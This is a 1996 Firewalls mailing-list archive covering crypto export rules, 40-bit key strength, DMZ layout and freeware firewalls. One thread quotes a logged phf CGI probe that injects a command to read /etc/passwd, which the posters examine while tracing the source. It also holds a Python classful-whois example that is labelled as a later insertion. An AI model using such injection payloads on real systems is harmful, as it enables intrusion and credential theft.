>> CISCO are producing ?

**NSC is in the network security business. We provide industrial-strength crypto for organizations regardless of their location. Granted, governments put restrictions on exporting/importing strong crypto, but it is far from being impossible to do. The issue is that in order to ship crypto stronger than 40 bits, one needs to have approval from the US state department (a US perspective). The approval is given based on the destined country and the end user. For example, we have shipped 56 bit DES to UK-owned companies numerous times.
We have actually shipped IDEA (a 128 bit cypher) abroad.

**Will the US relax its restrictions? Time will tell. There's much pressure from the security vendors toward this end. Will it happen? Probably. Will it happen this year? Probably not.

**From a crypto perspective, Cisco is about 2 years behind the industry leaders in network security. I encourage you to give a look at NSC's BorderGuard family of secure VPN products, emphasizing strong crypto from a company that has exported it to countries all over the world. (Of course, getting strong crypto into ex-Soviet nations and into N. Korea and PRC is not a simple process, though it is doable.)

**Check us out: http://www.network.com

**NSC is owned by Storage Tec; UK main offices in Woking; NSC-offices in Ascot are in the process of moving to Woking.

**Cheers

From firewalls-owner Thu Jul 11 13:54:32 1996
Date: Thu, 11 Jul 96 13:14:28 PDT
From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg)
Message-Id: <9607112014.AA02607@manzanita.DEV.3Com.COM.noname>
To: bobk@manzanita.DEV.3Com.COM, mdr@vodka.sse.att.com
Subject: Re: Web Server on DMZ
Cc: Firewalls@GreatCircle.COM, ggh14854@ussun2f.glaxo.com

I'm not disagreeing about any of the points many of you have made concerning whether or not one box can handle the need for protecting the company network vs. protecting the DMZ machines.
My points are that:

1) Unless you can keep a hot spare of your firewall equipment and configurations, you might be better off with two different systems that can be configured to back up each other in case of failure.

2) To protect your company network, you might seriously consider running your traffic through TWO different firewalls (utilizing different technology) in case someone breaks through one of the firewalls. There are people on this list who run their traffic through 3 different firewalls each of different technology. This is a little extreme for me, but then I don't know what their specific needs are for both security and connectivity.

One example that comes to mind is to use a simple firewall (such as a filtering router) to protect a proxy server or series of application servers to protect those servers themselves from compromise. In addition, a filtering router is generally better against a spoofing attack. Since the source address is masquerading as your own, it doesn't do any good to log those entries anyway.
This is a fun conversation folks,

BobK

From firewalls-owner Thu Jul 11 14:13:25 1996
From: johnstm@anubis.network.com (Tony M Johnson)
Message-Id: <9607112017.AA27522@anubis.network.com>
Subject: RE: CISCO network level encryption & key lengths
To: firewalls@greatcircle.com
Date: Thu, 11 Jul 1996 15:17:55 -0500 (CDT)

====================================================================
Tony Johnson                    Email: johnstm@anubis.network.com
Network Systems                 Voice: (612) 391-1176
7600 Boone Avenue North         Fax  : (612) 424-2853
Minneapolis, MN 55428
====================================================================

>> If the answer to the above are all "no" then does anyone have any alternative
>> product suggestions - that fall in line with the network level encryption
>> CISCO are producing ?
>>

**NSC is in the network security business. We provide industrial-strength crypto for organizations regardless of their location. Granted, governments put restrictions on exporting/importing strong crypto, but it is far from being impossible to do. The issue is that in order to ship crypto stronger than 40 bits, one needs to have approval from the US state department (a US perspective). The approval is given based on the destined country and the end user.
For example, we have shipped 56 bit DES to UK-owned companies numerous times. We have actually shipped IDEA (a 128 bit cypher) abroad.

**Will the US relax its restrictions? Time will tell. There's much pressure from the security vendors toward this end. Will it happen? Probably. Will it happen this year? Probably not.

**From a crypto perspective, Cisco is about 2 years behind the industry leaders in network security. I encourage you to give a look at NSC's BorderGuard family of secure VPN products, emphasizing strong crypto from a company that has exported it to countries all over the world. (Of course, getting strong crypto into ex-Soviet nations and into N. Korea and PRC is not a simple process, though it is doable.)

**Check us out: http://www.network.com

**NSC is owned by Storage Tec; UK main offices in Woking; NSC-offices in Ascot are in the process of moving to Woking.

**Cheers

From firewalls-owner Thu Jul 11 15:49:46 1996
From: Don_Tompkins@esd.tracor.com
Date: Thu, 11 Jul 1996 18:40:29 -0400
Message-Id: <1e5835e0@esd.tracor.com>
Subject: Re[2]: Freeware - resent note
To: "Joseph M. Flahiff", firewalls@greatcircle.com

This may duplicate a response to your earlier question.

Some very competent software engineering folks write freeware.
Risks are always associated with any product since it is nearly impossible to test and evaluate completely. "When am I done testing" is a non-trivial issue in any system with more than a very small set of combinations and permutations.

...

don

Author: Mailer-Daemon@mhhaa.compuserve.com at ESD
Returned mail
TO: Don Tompkins at TRACOR_ESD

------------------------------- Message Contents -------------------------------
To: firewalls, "joseph m. flahiff"
bcc: "patrick j. beskar"
From: Don_Tompkins
Date: 11 Jul 96 13:35:41
Subject: Re: Freeware

Have tended to use commercial products for security applications. But have used freeware with good results on other projects including some with demanding requirements.

A general comment: Freeware, shareware, and commercial ware are just different methods of providing products. Quality of product has more to do with factors such as the author(s) and design methods and tools than it does with distribution method. More formal or rigorous methods are important with security products and other critical hardware and software. Beyond the philosophy, availability for specific applications can also depend on resources and interest within government, academia, and industry.

______________________________ Reply Separator _________________________________
Subject: Freeware
Author: "Joseph M. Flahiff" at ESD
Date: 7/11/96 9:07 AM

What are people's experiences with freeware products for firewalling, proxy, etc.? Good, bad, dangerous?

TIA

Joseph Flahiff
Moss Bay Group, Inc.
Advisors in Technology Management

---- message ------

_____________________________ Reply Separator _________________________________
Subject: RE: Freeware
Author: "Joseph M.
Flahiff" at ESD
Date: 7/11/96 1:25 PM

----------
From: Jim Minie[SMTP:jminie@milkyway.com]
Sent: Thursday, July 11, 1996 11:38 AM
To: firewalls@greatcircle.com
Subject: Re: Freeware

Would you attempt to build your own virus software based on the knowledge that you've 'seen a few virii in your time'? There are more ways around most firewalls than is ever discussed in this group. IMHO, to create your own firewall without continual knowledge of what new attacks are being created almost daily is an act of network suicide... Getting in with a reputable firewall company who maintains this knowledge and passes updates along is very similar to quality virus companies who provide constant updates to their product addressing new strains.

Whoa! Sorry for asking!

Are you saying you have had a poor experience? I am not asking for personal opinions. I am looking for anecdotes, stories, examples, you know...experiences. Hence the wording of my question. "What are people's _experiences_..." I feel the same way you do. But, I thought, "It is a big world and maybe there is something I don't know about."

I was not talking about creating firewall software myself. But someone somewhere has to write the stuff. Who is to say that there is not some group of benevolent geniuses out there somewhere, fighting for right and doing it just because it is right not because they can make a buck doing it.

At 09:07 AM 7/11/96 -0700, you wrote:
> What are people's experiences with freeware products for firewalling, proxy, etc.? Good, bad, dangerous?
>
> TIA
>
> Joseph Flahiff
> Moss Bay Group, Inc.
> Advisors in Technology Management

From firewalls-owner Thu Jul 11 16:49:39 1996
From: Brian Murrell
Message-Id: <199607112337.QAA17619@mocha.bctel.net>
Date: Thu, 11 Jul 1996 16:37:26 -0700 (PDT)
To: johnstm@anubis.network.com
Cc: firewalls@GreatCircle.COM
Subject: RE[2]: CISCO network level encryption & key lengths
In-Reply-To: <9607112015.AA27387@anubis.network.com>

from the quill of johnstm@anubis.network.com (Tony M Johnson) on scroll <9607112015.AA27387@anubis.network.com>

> **NSC is owned by Storage Tec; UK main offices in Woking; NSC-offices in
> Ascot are in the process of moving to Woking.

Maybe if enough business left the US to be able to deal encryption without being hindered by draconian governments, the US might smarten up.

If some of you are tired of reality you might want to join me here in wonderland. :-)

b.

--
Brian J. Murrell
Brian_Murrell@bctel.net    BCTel Advanced Communications
brian@ilinx.com            Vancouver, B.C.
brian@wimsey.com           604 454 5279

From firewalls-owner Thu Jul 11 18:37:14 1996
Date: Thu, 11 Jul 96 20:22:55 EDT
From: bve@omsk.yourtown.com (BVE)
Message-Id: <9607120022.AA13435@omsk.yourtown.com>
To: firewalls@greatcircle.com
Subject: Re: Dirty Dogs

from the quill of hhantman@eo.ray.com (Howard Hantman) on scroll <9607111219.AA25794@eo.ray.com>

>> Well, folks, whether or not you try to contact genstar.net or zilker.net is
>> one issue, but I would definitely do SOMETHING, at least on your own systems.
>> Both of these log snippets indicate a SUCCESSFUL use of this attack. Especially
>> now that you've published your vulnerability to the world, I hope you're
>> disabling the script!
>
> From: Brian Murrell
>
> Not necessarily. Those look similar to the log files on our server,
> however if one looks at the corresponding errors file (for the Netscape
> server) one will notice error messages regarding the access and how the
> file could not be found.

Brian is correct. The access logs of the WWW servers I've used log all attempts, whether or not they are successful. We also were probed:

152.169.232.79 - - [03/Jul/1996:17:09:06 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -

This attempt failed, as we did not have a phf CGI script. Interestingly, here is the whois:

> whois -h rs.internic.net 152.169.232.0
No match for "152.169.232.0".

The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

...and:

> whois 152.169.232.0
No match for "152.169.232.0".
Please be advised that this whois server only contains DOD Information. All INTERNET Domain, IP Network Number, and ASN records are kept in the Internet Registry, RS.INTERNIC.NET.

...and nslookup:

> nslookup 152.169.232.79
Server:  omsk.yourtown.com
Address:  205.246.66.7

Name:    [152.169.232.79]
Address:  152.169.232.79

-----------------------------

This person seems to have covered their tracks pretty well. Any ideas on tracking them??

Bill Van Emburg
Quadrix Solutions, Inc.    (bve@quadrix.com)    (http://yourtown.com)
"You do what you want, and if you didn't, you don't"

From firewalls-owner Thu Jul 11 18:49:42 1996
From: Adam Shostack
Message-Id: <199607120236.VAA13959@homeport.org>
Subject: Re: CISCO network level encryption & key lengths
To: ckostick@csc.com (Chris Kostick)
Date: Thu, 11 Jul 1996 21:36:42 -0500 (EST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <01BB6F1F.52A2F060@ckostick.sed.csc.com> from "Chris Kostick" at Jul 11, 96 11:51:37 am

Several students cracked the SSL RC4-40 implementation in about 30 hours with borrowed cycles on computers around their schools. SSL uses a slick salting mechanism to make brute force attacks like this more difficult. However, *any* bad guy worth their salt can steal the compute time to do this in university labs, badly secured companies, etc.
The Blaze, Rivest, Diffie, et al paper made some estimates for
raw rc4-40 based on hardware time & cost. Ian Goldberg & David Wagner
came up with higher estimates for the rc4[md5(key+salt)] used in ssl,
because md5 doesn't work easily on the very low end fpga systems that
they were using. The Wagner Goldberg paper is entitled 'Architectural
Considerations for Cryptanalytic hardware'
http://www.cs.berkeley.edu/~iang/isaac/hardware/

Adam

Chris Kostick wrote:
| > Reading CISCO's online technology briefs for the forthcoming (is there a
| > firm release date ?) IOS 11.2 which includes network level encryption services
| > (DES encryption) (http://www.cisco.com/warp/public/732/Security/ncryp_tc.htm)
| > functionally it's exactly what we need to setup various distinct user groups
| > - however, according to Diffie, Blaze, Rivest et al
| > (http://www.bsa.org/policy/encryption/cryptographers.html)
| > the exportable key length (40 bits) is far too small, even the domestic
| > length (according to them) (56 bits) doesn't cut it.
|
| This one has always bothered me a little - '40 bits is way too small.' There are
| 1,099,511,627,776 possible combinations of a key. Given today's technology it is
| crackable using brute force methods. But, who is going to do that? A person
| or persons have to have *a lot* of CPU power to crack it in a reasonable amount of
| time unless they get really really lucky. A government can do it fairly
| fast I imagine. Larger corporations like IBM, Microsoft, DEC, Citicorp,
| DOW, Exxon, etc............. can probably supply the horsepower needed. Are
| these people your adversaries? If not, then your risk is not as great as people
| like Diffie, Blaze and Rivest make it out to be.

--
"It is seldom that liberty of any kind is lost all at once."
                                                        -Hume

From firewalls-owner Thu Jul 11 19:04:38 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA19661 for firewalls-outgoing; Thu, 11 Jul 1996 18:49:00 -0700 (PDT)
Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA19625 for ; Thu, 11 Jul 1996 18:48:49 -0700 (PDT)
Received: by relay.ashton.csc.com; id VAA10815; Thu, 11 Jul 1996 21:48:39 -0400
Received: from mccoy.ashton.csc.com(20.2.51.2) by relay.ashton.csc.com via smap (g3.0.1)
Received: (from ckostick@localhost) by mccoy.ashton.csc.com (8.6.12/8.6.9) id VAA17727; Thu, 11 Jul 1996 21:49:31 -0400
From: Chris Kostick
Message-Id: <199607120149.VAA17727@mccoy.ashton.csc.com>
Subject: Re: CISCO network level encryption & key lengths
To: adam@homeport.org (Adam Shostack)
Date: Thu, 11 Jul 1996 21:49:31 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199607120236.VAA13959@homeport.org> from "Adam Shostack" at Jul 11, 96 09:36:42 pm
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Several students cracked the SSL RC4-40 implementation in
> about 30 hours with borrowed cycles on computers around their schools.
> SSL uses a slick salting mechanism to make brute force attacks like
> this more difficult. However, *any* bad guy worth their salt can
> steal the compute time to do this in university labs, badly secured
> companies, etc.

This is kind of the point I'm driving at. Any bad guy won't do this. The
bad guys in question here aren't trying to look at love letters. They want
to steal some serious information if they're going to the trouble of
attacking an encryption code. Therefore, I don't think the bad guys would
risk using other people's machines to do this. Now, I go back to my original
statement.
The people you have to worry about are the big players;
governments and large corporations who have enough assets to try and 'crack'
a packet overnight. If that is who you consider your primary threat then
40-bit keys suck raw eggs. If not, then I still feel the data in transit
is reasonably secure. Feel free to disagree.

>
> The Blaze, Rivest, Diffie, et al paper made some estimates for
> raw rc4-40 based on hardware time & cost. Ian Goldberg & David Wagner
> came up with higher estimates for the rc4[md5(key+salt)] used in ssl,
> because md5 doesn't work easily on the very low end fpga systems that
> they were using. The Wagner Goldberg paper is entitled 'Architectural
> Considerations for Cryptanalytic hardware'
> http://www.cs.berkeley.edu/~iang/isaac/hardware/

Thank you for the pointer.

--
chris

From firewalls-owner Thu Jul 11 19:19:41 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA21100 for firewalls-outgoing; Thu, 11 Jul 1996 19:05:22 -0700 (PDT)
Received: from procion.ulpgc.es (procion.ulpgc.es [193.145.133.21]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA21072 for ; Thu, 11 Jul 1996 19:05:04 -0700 (PDT)
Received: by procion.ulpgc.es; id AA24556; Fri, 12 Jul 1996 03:02:25 +0100
Received: from cic.teleco.ulpgc.es by fobos.ulpgc.es (5.65/Ultrix4.2-C)
Received: from by cic (4.1/SMI-4.1)
Message-Id: <9607120303.AB18589@cic>
Comments: Authenticated sender is
From: "Miki Vazquez"
Organization: Univ. de Las Palmas de Gran Canaria
To: Firewalls@GreatCircle.COM
Date: Fri, 12 Jul 1996 02:58:56 +000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: Proxy Server For WinNT
Reply-To: mvazquez@cic.teleco.ulpgc.es
X-Mailer: Pegasus Mail for Windows (v2.40)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi

I suppose that it's a FAQ, but what do you think about proxies for NT?
I'm testing WinGate... but I want to know more options.
From firewalls-owner Thu Jul 11 19:34:38 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA22466 for firewalls-outgoing; Thu, 11 Jul 1996 19:22:08 -0700 (PDT)
Received: from darkwing.pacific.net.sg (darkwing.pacific.net.sg [203.120.89.89]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA22426 for ; Thu, 11 Jul 1996 19:21:54 -0700 (PDT)
Received: (qmail-queue invoked from smtpd); 12 Jul 1996 02:18:00 -0000
Received: from darkwing.pacific.net.sg (203.120.89.89)
Date: Fri, 12 Jul 1996 10:18:00 +0800 (SST)
From: Ng Pheng Siong
To: BVE
cc: firewalls@greatcircle.com
Subject: Re: Dirty Dogs
In-Reply-To: <9607120022.AA13435@omsk.yourtown.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 11 Jul 1996, BVE wrote:

> > whois -h rs.internic.net 152.169.232.0
> No match for "152.169.232.0".
>
> ...and:
> > whois 152.169.232.0
> No match for "152.169.232.0".

152.169 is a class B address, so do 'whois 152.169.0.0'.

home/ngps/PI:$ whois 152.169.0.0
Advanced Network & Services, Inc. (NET-ANS-BNET14)
   100 Clearbrook Rd
   Elmsford, NY 10523

   Netname: ANS-BNET14
   Netnumber: 152.169.0.0

   Coordinator:
      Mackey, Bruce  (BM814)  Mackey@AOL.COM
      703-453-4414

   Alternate Contact:
      ANS Network Operations Center  (ANS-NOC)  noc@ans.net
      1-800-456-6300

   Domain System inverse mapping provided by:

   HP81.PROD.AOL.NET            192.203.190.18
   OPS01.OPS.AOL.COM            152.163.80.11
   DNS-AOL.ANS.NET              198.83.210.28

Cheers.
- PS

--
Ng Pheng Siong                     * Finger for PGP key.
Pacific Internet Pte Ltd           * Singapore
Fast, secure, cheap. Pick two.
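Ng's advice (query the classful block, not the /24 you happen to see) and Matthew's reverse-zone lookup further down this thread both follow from the same pre-CIDR rule: 1996 registrations were keyed on the class A/B/C network. The Python below is an added example, not from any poster; it derives the classful block to hand to whois and the matching in-addr.arpa zone, and replays the two queries against a constructed stand-in for the InterNIC registry built only from the ANS record quoted above.

```python
import ipaddress

# Constructed stand-in for the InterNIC registry, holding just the ANS
# entry quoted in this thread; a real query would go to rs.internic.net.
REGISTRY = {
    "152.169.0.0": "Advanced Network & Services, Inc. (NET-ANS-BNET14)",
}


def classful_network(ip: str) -> ipaddress.IPv4Network:
    """Return the classful (pre-CIDR) network that contains ip.

    First octet 0-127 is class A (/8), 128-191 class B (/16),
    192-223 class C (/24).  Class D/E addresses have no classful
    network registration and raise ValueError.
    """
    addr = ipaddress.IPv4Address(ip)
    first_octet = int(addr) >> 24
    if first_octet < 128:
        prefix = 8
    elif first_octet < 192:
        prefix = 16
    elif first_octet < 224:
        prefix = 24
    else:
        raise ValueError(f"{ip}: class D/E address, no classful network")
    return ipaddress.ip_network(f"{ip}/{prefix}", strict=False)


def whois_query(ip: str) -> str:
    """Network number a 1996 whois server was keyed on:
    152.169.232.79 -> '152.169.0.0'."""
    return str(classful_network(ip).network_address)


def reverse_zone(ip: str) -> str:
    """in-addr.arpa zone that should carry the PTR records for the
    classful network: 152.169.232.79 -> '169.152.in-addr.arpa.'."""
    net = classful_network(ip)
    significant = str(net.network_address).split(".")[: net.prefixlen // 8]
    return ".".join(reversed(significant)) + ".in-addr.arpa."


def simulated_whois(query: str, registry: dict = REGISTRY) -> str:
    """Exact-match lookup, which is why 'whois 152.169.232.0' found nothing
    while 'whois 152.169.0.0' returned the ANS record."""
    return registry.get(query, f'No match for "{query}".')


if __name__ == "__main__":
    probe = "152.169.232.79"          # source address from BVE's log line
    print(simulated_whois("152.169.232.0"))          # the query that failed
    print(simulated_whois(whois_query(probe)))        # the query that works
    print(reverse_zone(probe))                        # zone to ask for PTRs
```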
From firewalls-owner Thu Jul 11 19:49:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA23951 for firewalls-outgoing; Thu, 11 Jul 1996 19:36:07 -0700 (PDT)
Received: from mark.allyn.com (mark.allyn.com [206.114.135.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id TAA23913 for ; Thu, 11 Jul 1996 19:35:51 -0700 (PDT)
Received: (from allyn@localhost) by mark.allyn.com (8.7.5/8.7) id TAA04199; Thu, 11 Jul 1996 19:38:19 -0700 (PDT)
From: Mark Allyn 206-860-9454
Message-Id: <199607120238.TAA04199@mark.allyn.com>
Subject: Re: Extending Financial Applications And Protecting via a Firewall
To: howzit@worldnet.att.net
Date: Thu, 11 Jul 1996 19:38:18 -0700 (PDT)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: <31E4821F.3D7@worldnet.att.net> from "Syer A. Caudill" at Jul 11, 96 00:25:03 am
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In response to questions about secure timekeeping stuff being done over
the public Internet web - - - - -

Hello:

Best solution is to use the secure socket layer (SSL) that Netscape has
already built into their web browsers. You would need the domestically
available 128 bit key version; not the exportable 40 bit key version that
has been decrypted via brute force mathematical analysis.

With a properly set up secure server (Netscape's is about $1000, I think,
and there are cheaper solutions available elsewhere) all of your
transactions over the web are encrypted and safe from tapping.

Then set up password authentication on your web server. Since you will be
using SSL, the username and password will be passed under cover over the
net and cannot be sniffed.

On this server, along with the SSL capable web server, install the Oracle
SQL Net client software. Don't install the database itself here.
That should be installed on another machine on the company's internal
network. Actually, best here to install the newer Oracle Secure SQL Net on
both the web server and the internal machine with the Oracle database. Be
careful though, the Oracle database must be of a certain revision (7.3, I
believe), in order for secure SQL net to work.

Install this secure dedicated web server on its own lan segment between two
filters. The outer filter should allow only http traffic from the outside
to touch the web server. No mail, telnet, ftp, or anything else. The inside
filter should allow only SQL Net traffic to go from the web server to the
inside network and only to the one machine that has the database. Nothing
else should be allowed through the inside filter except for possibly telnet
FROM the INSIDE to the web server to facilitate maintenance on it, although
best is to do all maintenance on the box itself from the console. Probably
best to have both boxes in the same (secured) physical location to
facilitate maintenance.

Good Luck!
Mark Allyn

From firewalls-owner Thu Jul 11 21:34:53 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA27022 for firewalls-outgoing; Thu, 11 Jul 1996 21:20:04 -0700 (PDT)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id VAA26465 for ; Thu, 11 Jul 1996 21:18:29 -0700 (PDT)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123)
Received: from c0038.isid.co.jp(133.158.252.1) by mycroft via smap (V1.3mjr)
Received: from success.isid.co.jp (root@c0033.isid.co.jp [133.158.251.1]) by isidgw.isid.co.jp (8.6.12+2.5W/3.3Wb-96030120) with ESMTP
Received: from c0480.isid.co.jp (c1837.isid.co.jp [133.158.136.7]) by success.isid.co.jp (8.6.12+2.5W/3.3Wb-96030120) with SMTP
Date: Fri, 12 Jul 1996 13:04:09 +0900
Message-Id: <199607120404.NAA06629@success.isid.co.jp>
X-Sender: akato@isid.co.jp
X-Mailer: Windows Eudora Pro Version 2.1.2J
Mime-Version: 1.0
Content-Type: text/plain; charset="ISO-2022-JP"
To: "Joseph M. Flahiff"
From: Akira KATO
Subject: Re: Freeware
Cc: "'Firewalls Listserv'"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 09:07 96/07/11 -0700, Joseph M. Flahiff wrote:
> What are people's experiences with freeware products for firewalling,
> proxy, etc.? Good, bad, dangerous?

Although I have no _experiences_ with this kind of stuff, it might be a
good idea for you to know the following URL and check it out.

http://www.etl.go.jp/etl/People/ysato@etl.go.jp/DeleGate/

In the mailing list of several hundred people who are using and
contributing to this freeware, I have never heard of a big problem beyond
minor bugs.

Sincerely,

Akira KATO
Information Services International-Dentsu, LTD.
System Integration Consulting Dept.
tel:+81-422-72-4893  fax:+81-422-72-4903
http://www.etl.go.jp:8080/etl/People/akato@etl.go.jp/

From firewalls-owner Thu Jul 11 21:49:37 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA00935 for firewalls-outgoing; Thu, 11 Jul 1996 21:30:55 -0700 (PDT)
Received: from dollar.firstpac.com.au (firstpac.com.au [203.61.7.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id VAA00785 for ; Thu, 11 Jul 1996 21:30:16 -0700 (PDT)
Received: from shekel.firstpac.com.au (shekel [203.61.14.12]) by dollar.firstpac.com.au (8.7.5/firstpac/0.99) with ESMTP id OAA29495; Fri, 12 Jul 1996 14:25:10 +1000 (EST)
Received: (from matt@localhost) by shekel.firstpac.com.au (8.7.2/8.7.2/firstpac) id OAA03656; Fri, 12 Jul 1996 14:27:52 +1000 (EST)
Message-Id: <199607120427.OAA03656@shekel.firstpac.com.au>
Subject: Re: Dirty Dogs
To: bve@omsk.yourtown.com (BVE)
Date: Fri, 12 Jul 1996 14:27:50 +1000 (EST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <9607120022.AA13435@omsk.yourtown.com> from "BVE" at Jul 11, 96 08:22:55 pm
X-Ph: ph: +61 2 394 4320 fax: +61 2 394 4398 home: +61 2 9929 0717
X-Pgp: pub 2047/DFA91FA1 1996/05/01 Matthew Keenan
X-Pgp: Key fingerprint = 36 09 88 84 FA 11 82 82 D7 E7 B8 23 6E B0 22 BB
From: Matthew Keenan
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

BVE wrote this...
> Brian is correct. The access logs of the WWW servers I've used log
> all attempts, whether or not they are successful. We also were
> probed:
> 152.169.232.79 - - [03/Jul/1996:17:09:06 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> This attempt failed, as we did not have a phf CGI script.
> Interestingly, here is the whois:
> > whois -h rs.internic.net 152.169.232.0
> No match for "152.169.232.0".
try
        whois -h rs.internic.net 152.169

[snip]

> ...and nslookup:
> > nslookup 152.169.232.79
> Server:  omsk.yourtown.com
> Address:  205.246.66.7
> Name:    [152.169.232.79]
> Address:  152.169.232.79

try
        % nslookup
        Default Server:  foo.bar.baz
        Address:  257.257.257.257

        > set type=any
        > 169.152.in-addr.arpa.
        Server:  foo.bar.baz
        Address:  257.257.257.257

        Non-authoritative answer:
        169.152.in-addr.arpa
                origin = hp81.prod.aol.net
                mail addr = postmaster.hp81.prod.aol.net
                serial = 2
                refresh = 3600 (1 hour)
                retry   = 300 (5 mins)
                expire  = 86400 (1 day)
                minimum ttl = 3600 (1 hour)

        Authoritative answers can be found from:
        [server listings snipped]

        > server hp81.prod.aol.net.
        Default Server:  hp81.prod.aol.net
        Address:  192.203.190.18

        > ls -d 169.152.in-addr.arpa.
        [hp81.prod.aol.net]
        *** Can't list domain 169.152.in-addr.arpa.: Query refused
        >

now that is a bit more informative but no zone dump unfortunately... but
considering the low serial (2), it probably has very little in the way of
records if any... you might want to traceroute to the address and try snmp
probing the routers closest to the target address.

> This person seems to have covered their tracks pretty well. Any ideas on
> tracking them??

not really, they seemed to have come from aol (assuming there is no source
routing). and since there would seem to be very few records for this subnet
(that i can find anyway), it would also probably be from a dial in address.
Matt

--
Matthew Keenan
Network Administrator
First Pacific Stockbrokers
Sydney, Australia

From firewalls-owner Thu Jul 11 22:08:11 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA02269 for firewalls-outgoing; Thu, 11 Jul 1996 21:54:49 -0700 (PDT)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id VAA29095 for ; Thu, 11 Jul 1996 21:25:04 -0700 (PDT)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123)
Received: from lighthouse.homeport.org(205.136.65.198) by mycroft via smap (V1.3mjr)
Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id XAA14177; Thu, 11 Jul 1996 23:17:39 -0500
From: Adam Shostack
Message-Id: <199607120417.XAA14177@homeport.org>
Subject: Re: CISCO network level encryption & key lengths
To: ckostick@ashton.csc.com (Chris Kostick)
Date: Thu, 11 Jul 1996 23:17:38 -0500 (EST)
Cc: adam@homeport.org, firewalls@greatcircle.com
In-Reply-To: <199607120149.VAA17727@mccoy.ashton.csc.com> from "Chris Kostick" at Jul 11, 96 09:49:31 pm
X-Mailer: ELM [version 2.4 PL24 ME8b]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Chris Kostick wrote:
| > Several students cracked the SSL RC4-40 implementation in
| > about 30 hours with borrowed cycles on computers around their schools.
| > SSL uses a slick salting mechanism to make brute force attacks like
| > this more difficult. However, *any* bad guy worth their salt can
| > steal the compute time to do this in university labs, badly secured
| > companies, etc.
|
| This is kind of the point I'm driving at. Any bad guy won't do this. The
| bad guys in question here aren't trying to look at love letters. They want
| to steal some serious information if they're going to the trouble of
| attacking an encryption code. Therefore, I don't think the bad guys would
| risk using other people's machines to do this.
| Now, I go back to my original
| statement. The people you have to worry about are the big players;
| governments and large corporations who have enough assets to try and 'crack'
| a packet overnight. If that is who you consider your primary threat then
| 40-bit keys suck raw eggs. If not, then I still feel the data in transit
| is reasonably secure. Feel free to disagree.

I see your point, and disagree somewhat. In the case of SSL v2, there is
substantial known plaintext at the start of a message; as such, bad guys
don't have to expose the sensitive information they want; they only need
to put the start of the message out there, and mail themselves any keys
that seem like hits. Bad guys will steal cycles for Crack, they'll steal
them for other attacks.

40 bits is not so pitifully weak as say, rot-13, but is too weak to
protect information of value that you're going to spend cpu cycles
encrypting. (Incidentally, the way rc4 works, using a 40 bit key takes
exactly as long as using a 128 bit key, since all the keys are permuted
into a 256(?) bit key in an initial step.)

The US government needs to reform its export laws; its own NAS panel
says so. This is because 40 bit keys are too weak for business use.

| > because md5 doesn't work easily on the very low end fpga systems that
| > they were using. The Wagner Goldberg paper is entitled 'Architectural
| > Considerations for Cryptanalytic hardware'
| > http://www.cs.berkeley.edu/~iang/isaac/hardware/
|
| Thank you for the pointer.

sure.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
                                                        -Hume

From firewalls-owner Fri Jul 12 12:11:57 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA00886 for firewalls-outgoing; Fri, 12 Jul 1996 11:21:15 -0700 (PDT)
Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA00840 for ; Fri, 12 Jul 1996 11:20:58 -0700 (PDT)
